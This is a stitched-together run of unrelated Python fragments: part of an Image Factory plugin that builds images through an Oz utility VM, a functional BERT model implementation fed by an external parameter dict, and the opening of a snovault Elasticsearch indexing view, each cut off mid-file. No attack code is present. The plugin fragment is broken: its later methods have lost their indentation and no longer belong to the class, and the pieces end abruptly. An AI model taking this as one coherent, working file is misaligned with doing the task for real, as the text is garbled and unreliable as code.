mode = "nothing"
if(debugMode) : print("\nELSE printing --> ", "back to nothing mode !\n")
| |
#!/usr/bin/python
#
# Copyright 2012 Red Hat, Inc.
# Portions Copyright (C) 2012,2013 <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import oz.TDL
import oz.GuestFactory
import oz.ozutil
import guestfs
# TODO: We've had to migrate to lxml here because of Oz changes
# see if we can't move the libvirt stuff as well
# For now we import both
import libxml2
import lxml
import configparser
import tempfile
import base64
import os
import os.path
from zope.interface import implementer
from imgfac.ApplicationConfiguration import ApplicationConfiguration
from imgfac.CloudDelegate import CloudDelegate
from imgfac.PersistentImageManager import PersistentImageManager
from imgfac.ReservationManager import ReservationManager
# This makes extensive use of parameters with some sensible defaults
# Try to keep an accurate list up here
# Parameter - Default -
# Description
# utility_image - <base_image_id>
# Description: UUID of the image that will be launched to do the modification of the
# the base_image referenced in this target_image build. Note that the
# utility image should itself be a base image and can, if constructed properly,
# be the same as the base image that is being modified. The plugin makes a copy
# of the utility image before launching it, which allows safe modification during
# the target_image creation process.
# input_image_file - /input_image.raw (but only if input_image_device is not specified)
# Description: The name of the file on the working space disk where the base_image is presented
# input_image_device - None
# Description: The name of the device where the base_image is presented to the utility VM.
# (e.g. vdc)
# NOTE: You can specify one or the other of these options but not both. If neither are specified
# you will end up with the default value for input_image_file.
# utility_cpus - None
# Description: Number of CPUs in the utility VM - this can also be set in the global Oz config
# The lmc Live CD creation process benefits greatly from extra CPUs during the squashfs
# creation step. The performance improvement is almost perfectly O(n) w.r.t CPU.
# utility_customizations - None
# Description: A partial TDL document to drive the actions of the utility VM - only repos, packages,
# files and commands will be used - all other content is ignored
# results_location - /results/images/boot.iso
# Description: Location inside of the working space image from which to extract the results.
# Borrowed from Oz by <NAME>
def data_from_type(name, contenttype, content):
    '''
    A function to get data out of some content, possibly decoding it depending
    on the content type. This function understands three types of content:
    raw (where no decoding is necessary), base64 (where the data needs to be
    base64 decoded), and url (where the data needs to be downloaded). Because
    the data might be large, all data is sent to file handle, which is returned
    from the function.

    Raises oz.OzException.OzException for an unrecognized content type.
    '''
    out = tempfile.NamedTemporaryFile()
    if contenttype == 'raw':
        # NamedTemporaryFile is opened in binary mode: encode str content
        # (the original passed str straight through, a Python 3 TypeError)
        out.write(content.encode('utf-8') if isinstance(content, str) else content)
    elif contenttype == 'base64':
        # base64.decode() wants file objects; the original used the
        # Python 2-only StringIO.StringIO name (NameError on Python 3)
        import io
        raw = content.encode('utf-8') if isinstance(content, str) else content
        base64.decode(io.BytesIO(raw), out)
    elif contenttype == 'url':
        # urlparse.urlparse was the Python 2 module path; use urllib.parse
        import urllib.parse
        url = urllib.parse.urlparse(content)
        if url.scheme == "file":
            # local file:// URL - copy the bytes straight across
            with open(url.netloc + url.path, 'rb') as f:
                out.write(f.read())
        else:
            oz.ozutil.http_download_file(content, out.fileno(), False, None)
    else:
        raise oz.OzException.OzException("Type for %s must be 'raw', 'url' or 'base64'" % (name))

    # make sure the data is flushed to disk for uses of the file through
    # the name
    out.flush()
    out.seek(0)

    return out
@implementer(CloudDelegate)
class IndirectionCloud(object):
    def __init__(self):
        """Wire the plugin up to the factory-wide singletons it relies on."""
        super(IndirectionCloud, self).__init__()
        # global image-factory configuration dictionary (e.g. 'imgdir')
        self.app_config = ApplicationConfiguration().configuration
        self.log = logging.getLogger('%s.%s' % (__name__, self.__class__.__name__))
        # registry used later to look up the utility image by UUID
        self.pim = PersistentImageManager.default_manager()
        self.res_mgr = ReservationManager()
    def builder_should_create_target_image(self, builder, target, image_id, template, parameters):
        """Run the whole indirection build, then opt out of the default flow.

        Delegates the real work to _builder_should_create_target_image() and
        always returns False so the factory performs no further target-image
        activity. Temporary images are removed even if the build raises.
        """
        # This plugin wants to be the only thing operating on the input image
        # We do all our work here and then return False which stops any additional activity
        self.working_space_image = None
        self.utility_image_tmp = None
        try:
            self._builder_should_create_target_image(builder, target, image_id, template, parameters)
        finally:
            self.log.debug("Cleaning up temporary utility image and working space image")
            # either path may be None if the build failed before creating it
            for fname in [ self.working_space_image, self.utility_image_tmp ]:
                if fname and os.path.isfile(fname):
                    os.unlink(fname)
        return False
    def _builder_should_create_target_image(self, builder, target, image_id, template, parameters):
        """Build the target image by re-animating a utility VM with Oz.

        Launches a (copy of a) utility image, exposes the base image to it as
        a file or a device plus a scratch disk, runs the TDL-driven
        customizations inside it, and finally extracts the results into
        builder.target_image.data. See the parameter list documented at the
        top of this module.
        """
        # User may specify a utility image - if they do not we assume we can use the input image
        utility_image_id = parameters.get('utility_image', image_id)
        # The utility image is what we actually re-animate with Oz
        # We borrow these variable names from code that is very similar to the Oz/TinMan OS plugin
        self.active_image = self.pim.image_with_id(utility_image_id)
        if not self.active_image:
            raise Exception("Could not find utility image with ID (%s)" % (utility_image_id) )
        self.tdlobj = oz.TDL.TDL(xmlstring=self.active_image.template)
        # Later on, we will either copy in the base_image content as a file, or expose it as a device
        # to the utility VM. We cannot do both. Detect invalid input here before doing any long running
        # work
        input_image_device = parameters.get('input_image_device', None)
        input_image_file = parameters.get('input_image_filename', None)
        if input_image_device and input_image_file:
            raise Exception("You can specify either an input_image_device or an input_image_file but not both")
        if (not input_image_device) and (not input_image_file):
            input_image_file="/input_image.raw"
        # We remove any packages, commands and files from the original TDL - these have already been
        # installed/executed. We leave the repos in place, as it is possible that commands executed
        # later may depend on them
        self.tdlobj.packages = [ ]
        self.tdlobj.commands = { }
        self.tdlobj.files = { }
        # This creates a new Oz object - replaces the auto-generated disk file location with
        # a copy of the utility image we will make later, and prepares an initial libvirt_xml string
        self._init_oz()
        self.utility_image_tmp = self.app_config['imgdir'] + "/tmp-utility-image-" + str(builder.target_image.identifier)
        self.guest.diskimage = self.utility_image_tmp
        # Below we will create this file as a qcow2 image using the original utility image as
        # a backing store - For the follow-on XML generation to work correctly, we need to force
        # Oz to use qcow2 as the image type
        self.guest.image_type = 'qcow2'
        if 'utility_cpus' in parameters:
            self.guest.install_cpus = int(parameters['utility_cpus'])
        libvirt_xml = self.guest._generate_xml("hd", None)
        libvirt_doc = libxml2.parseDoc(libvirt_xml)
        # Now we create a second disk image as working/scratch space
        # Hardcode at 30G
        # TODO: Make configurable
        # Make it, format it, copy in the base_image
        self.working_space_image = self.app_config['imgdir'] + "/working-space-image-" + str(builder.target_image.identifier)
        self.create_ext2_image(self.working_space_image)
        # Modify the libvirt_xml used with Oz to contain a reference to a second "working space" disk image
        working_space_device = parameters.get('working_space_device', 'vdb')
        self.add_disk(libvirt_doc, self.working_space_image, working_space_device)
        self.log.debug("Updated domain XML with working space image:\n%s" % (libvirt_xml))
        # We expect to find a partial TDL document in this parameter - this is what drives the
        # tasks performed by the utility image
        if 'utility_customizations' in parameters:
            self.oz_refresh_customizations(parameters['utility_customizations'])
        else:
            self.log.info('No additional repos, packages, files or commands specified for utility tasks')
        # Create a qcow2 image using the original utility image file (which may be read-only) as a
        # backing store.
        self.log.debug("Creating temporary writeable qcow2 working copy of utlity image (%s) as (%s)" % (self.active_image.data, self.utility_image_tmp))
        self.guest._internal_generate_diskimage(image_filename=self.utility_image_tmp, backing_filename=self.active_image.data)
        if input_image_file:
            # Here we finally involve the actual Base Image content - it is made available for the utility image to modify
            self.copy_content_to_image(builder.base_image.data, self.working_space_image, input_image_file)
        else:
            # Note that we know that one or the other of these are set because of code earlier
            self.add_disk(libvirt_doc, builder.base_image.data, input_image_device)
        # Run all commands, repo injection, etc specified
        try:
            self.log.debug("Launching utility image and running any customizations specified")
            libvirt_xml = libvirt_doc.serialize(None, 1)
            self.guest.customize(libvirt_xml)
            self.log.debug("Utility image tasks complete")
        finally:
            # always tear down Oz install artifacts, even on failure
            self.log.debug("Cleaning up install artifacts")
            self.guest.cleanup_install()
        # After shutdown, extract the results
        results_location = parameters.get('results_location', "/results/images/boot.iso")
        self.copy_content_from_image(results_location, self.working_space_image, builder.target_image.data)
def add_disk(self, libvirt_doc, disk_image_file, device_name):
devices = libvirt_doc.xpathEval("/domain/devices")[0]
new_dev = devices.newChild(None, "disk", None)
new_dev.setProp("type", "file")
new_dev.setProp("device", "disk")
source = new_dev.newChild(None, "source", None)
source.setProp("file", disk_image_file)
target = new_dev.newChild(None, "target", None)
target.setProp("dev", device_name)
target.setProp("bus", self.guest.disk_bus)
def oz_refresh_customizations(self, partial_tdl):
# This takes our already created and well formed TDL object with already blank customizations
# and attempts to add in any additional customizations found in partial_tdl
# partial_tdl need not contain the <os>, <name> or <description> sections
| |
<gh_stars>1-10
########################################################
# HuggingFace Transformer implementaion. #
# Modify for forward passing with non-leaf parameters. #
########################################################
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import math
import numbers
import os
import sys
import torch
from torch import embedding, nn
from torch.nn import CrossEntropyLoss, MSELoss
import torch.nn.functional as F
from transformers.modeling_utils import PreTrainedModel, prune_linear_layer
from transformers.configuration_bert import BertConfig
from transformers.file_utils import add_start_docstrings
from transformers.modeling_bert import (BERT_PRETRAINED_MODEL_ARCHIVE_MAP,
load_tf_weights_in_bert, ACT2FN, BertLayerNorm)
logger = logging.getLogger('Modeling BERT')
class BertEmbeddings(nn.Module):
    """Construct the embeddings from word, position and token_type embeddings.

    Unlike the stock HuggingFace module, the embedding weights are NOT read
    from the nn.Embedding sub-modules at forward time; they are looked up in
    the externally supplied ``params`` dict (keyed by ``params_prefix``).
    The sub-modules only contribute configuration (padding_idx, max_norm,
    etc.) to the functional F.embedding calls.
    """
    def __init__(self, config):
        super(BertEmbeddings, self).__init__()
        self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=0)
        self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
        self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
        # self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
        # any TensorFlow checkpoint file
        self.layer_norm_n_shape = (config.hidden_size, )
        self.layer_norm_eps=config.layer_norm_eps
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
    def forward(self, params, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None, params_prefix='embeddings'):
        """Sum word/position/token-type embeddings, then LayerNorm + dropout.

        params: dict of tensors keyed f'{params_prefix}_<name>' (e.g.
            'embeddings_word_embeddings_weight', 'embeddings_LayerNorm_bias').
        Exactly one of input_ids / inputs_embeds should be provided; input_ids
        takes precedence for shape/device inference.
        """
        if input_ids is not None:
            input_shape = input_ids.size()
        else:
            input_shape = inputs_embeds.size()[:-1]
        seq_length = input_shape[1]
        device = input_ids.device if input_ids is not None else inputs_embeds.device
        if position_ids is None:
            # default positions are simply 0..seq_length-1 for every batch row
            position_ids = torch.arange(seq_length, dtype=torch.long, device=device)
            position_ids = position_ids.unsqueeze(0).expand(input_shape)
        if token_type_ids is None:
            token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
        if inputs_embeds is None:
            inputs_embeds = F.embedding(input_ids,
                                params[f'{params_prefix}_word_embeddings_weight'],
                                self.word_embeddings.padding_idx, self.word_embeddings.max_norm,
                                self.word_embeddings.norm_type, self.word_embeddings.scale_grad_by_freq,
                                self.word_embeddings.sparse)
        position_embeddings = F.embedding(position_ids,
                                params[f'{params_prefix}_position_embeddings_weight'],
                                self.position_embeddings.padding_idx, self.position_embeddings.max_norm,
                                self.position_embeddings.norm_type, self.position_embeddings.scale_grad_by_freq,
                                self.position_embeddings.sparse)
        token_type_embeddings = F.embedding(token_type_ids,
                                params[f'{params_prefix}_token_type_embeddings_weight'],
                                self.token_type_embeddings.padding_idx, self.token_type_embeddings.max_norm,
                                self.token_type_embeddings.norm_type, self.token_type_embeddings.scale_grad_by_freq,
                                self.token_type_embeddings.sparse)
        embeddings = inputs_embeds + position_embeddings + token_type_embeddings
        # embeddings = self.LayerNorm(embeddings)
        # functional LayerNorm with affine weights taken from `params`
        embeddings = F.layer_norm(
            embeddings, self.layer_norm_n_shape,
            params[f'{params_prefix}_LayerNorm_weight'],
            params[f'{params_prefix}_LayerNorm_bias'],
            self.layer_norm_eps)
        embeddings = self.dropout(embeddings)
        return embeddings
class BertSelfAttention(nn.Module):
    """Multi-head (self or cross) attention with externally supplied weights.

    Query/key/value projections are computed with F.linear using tensors
    from the ``params`` dict rather than module-owned nn.Linear layers.
    """
    def __init__(self, config):
        super(BertSelfAttention, self).__init__()
        if config.hidden_size % config.num_attention_heads != 0:
            raise ValueError(
                "The hidden size (%d) is not a multiple of the number of attention "
                "heads (%d)" % (config.hidden_size, config.num_attention_heads))
        self.output_attentions = config.output_attentions
        self.num_attention_heads = config.num_attention_heads
        self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
        self.all_head_size = self.num_attention_heads * self.attention_head_size
        self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
    def transpose_for_scores(self, x):
        """Reshape (batch, seq, all_head) -> (batch, heads, seq, head_size)."""
        new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
        x = x.view(*new_x_shape)
        return x.permute(0, 2, 1, 3)
    def forward(self, params, params_prefix, hidden_states, attention_mask=None, head_mask=None, encoder_hidden_states=None, encoder_attention_mask=None):
        """Return (context_layer,) or (context_layer, attention_probs).

        If encoder_hidden_states is given this acts as cross-attention:
        keys/values come from the encoder states and encoder_attention_mask
        replaces attention_mask.
        """
        mixed_query_layer = F.linear(hidden_states,
                                params[f'{params_prefix}_query_weight'],
                                params[f'{params_prefix}_query_bias'])
        if encoder_hidden_states is not None:
            mixed_key_layer = F.linear(encoder_hidden_states,
                                params[f'{params_prefix}_key_weight'],
                                params[f'{params_prefix}_key_bias'])
            mixed_value_layer = F.linear(encoder_hidden_states,
                                params[f'{params_prefix}_value_weight'],
                                params[f'{params_prefix}_value_bias'])
            attention_mask = encoder_attention_mask
        else:
            mixed_key_layer = F.linear(hidden_states,
                                params[f'{params_prefix}_key_weight'],
                                params[f'{params_prefix}_key_bias'])
            mixed_value_layer = F.linear(hidden_states,
                                params[f'{params_prefix}_value_weight'],
                                params[f'{params_prefix}_value_bias'])
        query_layer = self.transpose_for_scores(mixed_query_layer)
        key_layer = self.transpose_for_scores(mixed_key_layer)
        value_layer = self.transpose_for_scores(mixed_value_layer)
        # Take the dot product between "query" and "key" to get the raw attention scores.
        attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
        # scale by sqrt(d_k) as in "Attention Is All You Need"
        attention_scores = attention_scores / math.sqrt(self.attention_head_size)
        if attention_mask is not None:
            # Apply the attention mask is (precomputed for all layers in BertModel forward() function)
            attention_scores = attention_scores + attention_mask
        # Normalize the attention scores to probabilities.
        attention_probs = nn.Softmax(dim=-1)(attention_scores)
        # This is actually dropping out entire tokens to attend to, which might
        # seem a bit unusual, but is taken from the original Transformer paper.
        attention_probs = self.dropout(attention_probs)
        # Mask heads if we want to
        if head_mask is not None:
            attention_probs = attention_probs * head_mask
        context_layer = torch.matmul(attention_probs, value_layer)
        # merge the head dimension back: (batch, seq, all_head_size)
        context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
        new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
        context_layer = context_layer.view(*new_context_layer_shape)
        outputs = (context_layer, attention_probs) if self.output_attentions else (context_layer,)
        return outputs
class BertSelfOutput(nn.Module):
    """Self-attention output sublayer: dense projection, dropout, then a
    residual LayerNorm, with all weights supplied via the ``params`` dict."""

    def __init__(self, config):
        super(BertSelfOutput, self).__init__()
        # shape/eps only; the affine LayerNorm weights arrive at forward time
        self.layer_norm_n_shape = (config.hidden_size, )
        self.layer_norm_eps = config.layer_norm_eps
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, params, params_prefix, hidden_states, input_tensor):
        projected = F.linear(hidden_states,
                             params[f'{params_prefix}_dense_weight'],
                             params[f'{params_prefix}_dense_bias'])
        projected = self.dropout(projected)
        # residual connection followed by layer normalization
        return F.layer_norm(projected + input_tensor,
                            self.layer_norm_n_shape,
                            params[f'{params_prefix}_LayerNorm_weight'],
                            params[f'{params_prefix}_LayerNorm_bias'],
                            self.layer_norm_eps)
class BertAttention(nn.Module):
    """Attention block: BertSelfAttention followed by BertSelfOutput."""

    def __init__(self, config):
        super(BertAttention, self).__init__()
        self.self = BertSelfAttention(config)
        self.output = BertSelfOutput(config)
        self.pruned_heads = set()

    def forward(self, params, params_prefix, hidden_states, attention_mask=None, head_mask=None, encoder_hidden_states=None, encoder_attention_mask=None):
        attn_results = self.self(params, f'{params_prefix}_self',
                                 hidden_states, attention_mask, head_mask,
                                 encoder_hidden_states, encoder_attention_mask)
        projected = self.output(params, f'{params_prefix}_output',
                                attn_results[0], hidden_states)
        # prepend the projected context; keep any attention maps that follow
        return (projected,) + attn_results[1:]
class BertIntermediate(nn.Module):
    """Feed-forward expansion sublayer: dense projection plus activation.

    The dense weights are supplied through the ``params`` dict at forward
    time rather than being owned by this module.
    """
    def __init__(self, config):
        super(BertIntermediate, self).__init__()
        # config.hidden_act is either the name of an activation in ACT2FN or
        # a callable itself. The old `... or (sys.version_info[0] == 2 and
        # isinstance(config.hidden_act, unicode))` clause was a Python 2
        # leftover - this file requires Python 3 (it uses f-strings), where
        # `unicode` does not exist, so the clause is dropped.
        if isinstance(config.hidden_act, str):
            self.intermediate_act_fn = ACT2FN[config.hidden_act]
        else:
            self.intermediate_act_fn = config.hidden_act
    def forward(self, params, params_prefix, hidden_states):
        hidden_states = F.linear(hidden_states,
                                 params[f'{params_prefix}_dense_weight'],
                                 params[f'{params_prefix}_dense_bias'])
        hidden_states = self.intermediate_act_fn(hidden_states)
        return hidden_states
class BertOutput(nn.Module):
    """Feed-forward output sublayer: dense projection back to hidden size,
    dropout, then a residual LayerNorm with externally supplied weights."""

    def __init__(self, config):
        super(BertOutput, self).__init__()
        # the affine LayerNorm parameters arrive via `params` at forward time
        self.layer_norm_n_shape = (config.hidden_size, )
        self.layer_norm_eps = config.layer_norm_eps
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, params, params_prefix, hidden_states, input_tensor):
        down_proj = F.linear(hidden_states,
                             params[f'{params_prefix}_dense_weight'],
                             params[f'{params_prefix}_dense_bias'])
        down_proj = self.dropout(down_proj)
        # residual add followed by layer normalization
        return F.layer_norm(down_proj + input_tensor,
                            self.layer_norm_n_shape,
                            params[f'{params_prefix}_LayerNorm_weight'],
                            params[f'{params_prefix}_LayerNorm_bias'],
                            self.layer_norm_eps)
class BertLayer(nn.Module):
    """One transformer layer: self-attention, optional cross-attention
    (decoder mode), then the feed-forward intermediate/output blocks.

    All dense weights are fetched from the external ``params`` dict using
    keys derived from ``self.params_prefix``.
    """

    def __init__(self, config, params_prefix=''):
        super(BertLayer, self).__init__()
        self.attention = BertAttention(config)
        self.is_decoder = config.is_decoder
        if self.is_decoder:
            self.crossattention = BertAttention(config)
        self.intermediate = BertIntermediate(config)
        self.output = BertOutput(config)
        self.params_prefix = params_prefix

    def forward(self, params, hidden_states, attention_mask=None, head_mask=None, encoder_hidden_states=None, encoder_attention_mask=None):
        """Run the layer; returns ``(layer_output, *attention_extras)``."""
        self_attention_outputs = self.attention(params, f'{self.params_prefix}_attention', hidden_states, attention_mask, head_mask)
        attention_output = self_attention_outputs[0]
        outputs = self_attention_outputs[1:]  # add self attentions if we output attention weights
        if self.is_decoder and encoder_hidden_states is not None:
            # BUG FIX: self.crossattention is a BertAttention, whose forward
            # signature is (params, params_prefix, hidden_states, ...).
            # Previously `attention_output` was passed where `params` belongs,
            # shifting every argument by two positions.
            cross_attention_outputs = self.crossattention(
                params,
                f'{self.params_prefix}_crossattention',
                attention_output,
                attention_mask,
                head_mask,
                encoder_hidden_states,
                encoder_attention_mask,
            )
            attention_output = cross_attention_outputs[0]
            outputs = outputs + cross_attention_outputs[1:]  # add cross attentions if we output attention weights
        intermediate_output = self.intermediate(params, f'{self.params_prefix}_intermediate', attention_output)
        layer_output = self.output(params, f'{self.params_prefix}_output', intermediate_output, attention_output)
        outputs = (layer_output,) + outputs
        return outputs
class BertEncoder(nn.Module):
    """Stack of BertLayer modules, optionally collecting per-layer hidden
    states and attention maps per the config flags."""

    def __init__(self, config):
        super(BertEncoder, self).__init__()
        self.output_attentions = config.output_attentions
        self.output_hidden_states = config.output_hidden_states
        self.layer = nn.ModuleList([BertLayer(config, f'encoder_layer_{i}') for i in range(config.num_hidden_layers)])

    def forward(self, params, hidden_states, attention_mask=None, head_mask=None, encoder_hidden_states=None, encoder_attention_mask=None):
        """Run every layer in order.

        Returns ``(last_hidden_state, [all_hidden_states], [all_attentions])``
        where the bracketed entries appear only when the corresponding
        config flag is set.
        """
        all_hidden_states = ()
        all_attentions = ()
        for i, layer_module in enumerate(self.layer):
            if self.output_hidden_states:
                all_hidden_states = all_hidden_states + (hidden_states,)
            # FIX: head_mask defaults to None but was indexed unconditionally,
            # raising TypeError for any caller that does not supply a mask.
            layer_head_mask = head_mask[i] if head_mask is not None else None
            layer_outputs = layer_module(params, hidden_states, attention_mask, layer_head_mask, encoder_hidden_states, encoder_attention_mask)
            hidden_states = layer_outputs[0]
            if self.output_attentions:
                all_attentions = all_attentions + (layer_outputs[1],)
        # Add last layer
        if self.output_hidden_states:
            all_hidden_states = all_hidden_states + (hidden_states,)
        outputs = (hidden_states,)
        if self.output_hidden_states:
            outputs = outputs + (all_hidden_states,)
        if self.output_attentions:
            outputs = outputs + (all_attentions,)
        return outputs  # last-layer hidden state, (all hidden states), (all attentions)
class BertPooler(nn.Module):
    """Pools the encoder output by transforming the first ([CLS]) token."""

    def __init__(self, config):
        super(BertPooler, self).__init__()
        self.activation = nn.Tanh()

    def forward(self, params, hidden_states):
        """Dense + tanh over the first token of every sequence in the batch."""
        # "Pooling" here is simply taking the hidden state of token 0.
        cls_token = hidden_states[:, 0]
        dense_out = F.linear(cls_token,
                             params['pooler_dense_weight'],
                             params['pooler_dense_bias'])
        return self.activation(dense_out)
class BertPreTrainedModel(PreTrainedModel):
    """Abstract base that handles weight initialization and the shared
    download/load interface for pretrained BERT checkpoints.
    """
    config_class = BertConfig
    pretrained_model_archive_map = BERT_PRETRAINED_MODEL_ARCHIVE_MAP
    load_tf_weights = load_tf_weights_in_bert
    base_model_prefix = "bert"

    def _init_weights(self, module):
        """Initialize *module* in place, mirroring the TF BERT scheme."""
        is_linear = isinstance(module, nn.Linear)
        if is_linear or isinstance(module, nn.Embedding):
            # TF uses truncated_normal; a plain normal is the accepted
            # approximation here (cf https://github.com/pytorch/pytorch/pull/5617).
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
        elif isinstance(module, BertLayerNorm):
            module.bias.data.zero_()
            module.weight.data.fill_(1.0)
        if is_linear and module.bias is not None:
            module.bias.data.zero_()
class BertModel(BertPreTrainedModel):
r"""
Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs:
**last_hidden_state**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length, hidden_size)``
Sequence of hidden-states at the output of the last layer of the model.
**pooler_output**: ``torch.FloatTensor`` of shape ``(batch_size, hidden_size)``
Last layer hidden-state of the first token of the sequence (classification token)
further processed by a Linear layer and a Tanh activation function. The Linear
layer weights are trained from the next sentence prediction (classification)
objective during Bert pretraining. This output is usually *not* a good summary
of the semantic content of the input, you're often better with averaging or pooling
the sequence of hidden-states for the whole input sequence.
**hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``)
list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings)
of shape ``(batch_size, sequence_length, hidden_size)``:
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
**attentions**: (`optional`, returned when ``config.output_attentions=True``)
list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``:
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads.
Examples::
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertModel.from_pretrained('bert-base-uncased')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute")).unsqueeze(0) # Batch | |
# repo: caseylitton/snovault
import os
from elasticsearch.exceptions import (
ConflictError,
ConnectionError,
NotFoundError,
TransportError,
)
from pyramid.view import view_config
from pyramid.settings import asbool
from sqlalchemy.exc import StatementError
from snovault import (
COLLECTIONS,
DBSESSION,
STORAGE
)
from snovault.storage import (
TransactionRecord,
)
from urllib3.exceptions import ReadTimeoutError
from .interfaces import (
ELASTIC_SEARCH,
INDEXER,
RESOURCES_INDEX,
)
from .indexer_state import (
IndexerState,
all_uuids,
all_types,
SEARCH_MAX
)
from .simple_queue import SimpleUuidServer
import datetime
import logging
import pytz
import time
import copy
import json
import requests
# Silence the chatty elasticsearch client logger; only real errors surface.
es_logger = logging.getLogger("elasticsearch")
es_logger.setLevel(logging.ERROR)
log = logging.getLogger('snovault.elasticsearch.es_index_listener')
# Above this many bool-query clauses we fall back to a full reindex
# (ES rejects overly large bool queries; see get_related_uuids).
MAX_CLAUSES_FOR_ES = 8192
# Name of the built-in in-process uuid queue (SimpleUuidServer).
DEFAULT_QUEUE = 'Simple'
def _update_for_uuid_queues(registry):
    """Register the optional uuid_queue adapter on the registry, if installed.

    On success, adds ``registry['UuidQueue']`` and extends
    ``registry['available_queues']`` with the adapter's queue type names;
    on ImportError the registry is left untouched.
    """
    try:
        import snovault.elasticsearch.uuid_queue as queue_adapter
    except ImportError as import_error:
        log.info('No uuid_queue package in elasticsearch module: %s', repr(import_error))
    else:
        registry['UuidQueue'] = queue_adapter.QueueAdapter
        extra_queue_names = queue_adapter.QueueTypes.get_all()
        log.info('Extra Indexer Queues Available: %s', ','.join(extra_queue_names))
        registry['available_queues'].extend(extra_queue_names)
def includeme(config):
    """Add index listener endpoint and setup Indexer."""
    config.add_route('index', '/index')
    config.scan(__name__)
    registry = config.registry
    settings = registry.settings
    if not settings.get('indexer'):
        # Not an indexer process: endpoint exists but no queues/indexer built.
        return
    registry['available_queues'] = [DEFAULT_QUEUE]
    _update_for_uuid_queues(registry)
    # Multi-process indexing registers its own INDEXER elsewhere.
    if not settings.get('indexer.processes'):
        registry[INDEXER] = Indexer(registry)
def get_related_uuids(request, es, updated, renamed):
    '''Returns (set of uuids, False) or (list of all uuids, True) if full reindex triggered'''
    total_changed = len(updated) + len(renamed)
    if total_changed > MAX_CLAUSES_FOR_ES:
        # Too many clauses for a single ES bool query: reindex everything.
        return (list(all_uuids(request.registry)), True)  # guaranteed unique
    if total_changed == 0:
        return (set(), False)
    es.indices.refresh(RESOURCES_INDEX)
    # TODO: batching the terms clauses could let a partial reindex scale past
    # SEARCH_MAX (99999) instead of falling back to a full reindex.
    query = {
        'query': {
            'bool': {
                'should': [
                    {
                        'terms': {
                            'embedded_uuids': updated,
                            '_cache': False,
                        },
                    },
                    {
                        'terms': {
                            'linked_uuids': renamed,
                            '_cache': False,
                        },
                    },
                ],
            },
        },
        '_source': False,
    }
    res = es.search(index=RESOURCES_INDEX, size=SEARCH_MAX, request_timeout=60, body=query)
    if res['hits']['total'] > SEARCH_MAX:
        # More referencing documents than we can page through: full reindex.
        return (list(all_uuids(request.registry)), True)  # guaranteed unique
    related = {hit['_id'] for hit in res['hits']['hits']}
    return (related, False)
@view_config(route_name='index', request_method='POST', permission="index")
def index(request):
    """Run one indexing cycle.

    Determines the set of invalidated uuids (from the transaction log, a
    priority cycle, or a full reindex), hands them to the Indexer, and
    records the cycle summary in the meta index.  POST-body options:
    ``record``, ``dry_run``, ``recovery``, ``last_xmin``, ``types``,
    ``is_testing_full``.  Returns the cycle-summary dict.
    """
    INDEX = request.registry.settings['snovault.elasticsearch.index']
    # Setting request.datastore here only works because routed views are not traversed.
    request.datastore = 'database'
    record = request.json.get('record', False)
    dry_run = request.json.get('dry_run', False)
    recovery = request.json.get('recovery', False)
    es = request.registry[ELASTIC_SEARCH]
    indexer = request.registry[INDEXER]
    session = request.registry[DBSESSION]()
    connection = session.connection()
    first_txn = None
    snapshot_id = None
    restart=False
    invalidated = []
    xmin = -1
    is_testing = asbool(request.registry.settings.get('testing', False))
    is_testing_full = request.json.get('is_testing_full', False)
    # Currently 2 possible followup indexers (base.ini [set stage_for_followup = vis_indexer, region_indexer])
    stage_for_followup = list(request.registry.settings.get("stage_for_followup", '').replace(' ','').split(','))
    # May have undone uuids from prior cycle
    state = IndexerState(es, INDEX, followups=stage_for_followup)
    (xmin, invalidated, restart) = state.priority_cycle(request)
    state.log_reindex_init_state()
    # OPTIONAL: restart support
    if restart:  # Currently not bothering with restart!!!
        xmin = -1
        invalidated = []
    # OPTIONAL: restart support
    result = state.get_initial_state()  # get after checking priority!
    if xmin == -1 or len(invalidated) == 0:
        # Fresh cycle (no staged priority work): establish the new snapshot
        # boundary and recover the previous one.
        xmin = get_current_xmin(request)
        last_xmin = None
        if 'last_xmin' in request.json:
            last_xmin = request.json['last_xmin']
        else:
